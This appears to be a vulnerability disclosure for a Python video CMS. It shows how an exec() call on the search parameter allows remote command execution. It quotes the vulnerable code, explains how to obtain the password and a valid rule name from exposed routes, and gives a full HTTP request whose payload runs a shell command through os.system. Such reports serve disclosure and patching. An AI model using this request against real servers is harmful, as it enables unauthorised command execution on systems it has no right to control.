A code execution vulnerability in controllers.cms.CMS.searchContent
allows an attacker to unconditionally execute system commands.
The relevant code is as follows.
if wd: # 搜索
if rule == 'drpy':
print(f'准备单独处理聚合搜索:{wd}')
return multi_search(wd)
# return multi_search2(wd)
else:
data = cms.searchContent(wd, pg)
# print(data)
return jsonify(data)
After code audit, in order to get here, the following three parameters need to be passed: pwd, rule, wd.
The pwd parameter must be verified with js0_password = lsg.getItem('JS0_PASSWORD', cfg.get('JS0_PASSWORD', ''))
. If they are consistent, you can go down. Otherwise, it will exit and report 403.
The rule parameter must be checked against the rules in rule_list to pass, otherwise it will exit.
The wd parameter is the payload to be passed in.
Obtain all fields that can query storage_service
through the /info
route, including JS0_PASSWORD
For the rule parameter, you only need to ensure that it exists in rule_list
. You can get the rule list by accessing the /rules/view
route. You can select one of several rules. The one selected here is AnFuns
.
The last is the wd parameter, because the vulnerability code is like this,
if url.find('fypage') > -1:
if '(' in url and ')' in url:
# url_rep = url[url.find('('):url.find(')')+1]
# cnt_page = url.split('(')[1].split(')')[0].replace('fypage',pg)
# print(url_rep)
url_rep = re.search('.*?\((.*)\)', url, re.M | re.S).groups()[0]
cnt_page = url_rep.replace('fypage', pg)
# print(url_rep)
# print(cnt_page)
cnt_ctx = {}
exec(f'cnt_pg={cnt_page}', cnt_ctx)
cnt_pg = str(cnt_ctx['cnt_pg']) # 计算表达式的结果
url = url.replace(url_rep, str(cnt_pg)).replace('(', '').replace(')', '')
# print(url)
So you need to put the actual payload in () brackets, the request is as follows.
GET /vod?pwd=dzyyds&rule=AnFuns&wd=(1111;import%20os;os.system("curl%20127.0.0.1:9999")) HTTP/1.1
Host: 127.0.0.1:5705
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: sid=71884250c4b04a0c9c5827090c2553a8; token=b962db9103003a2a8b52d1fe5f33c7d4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1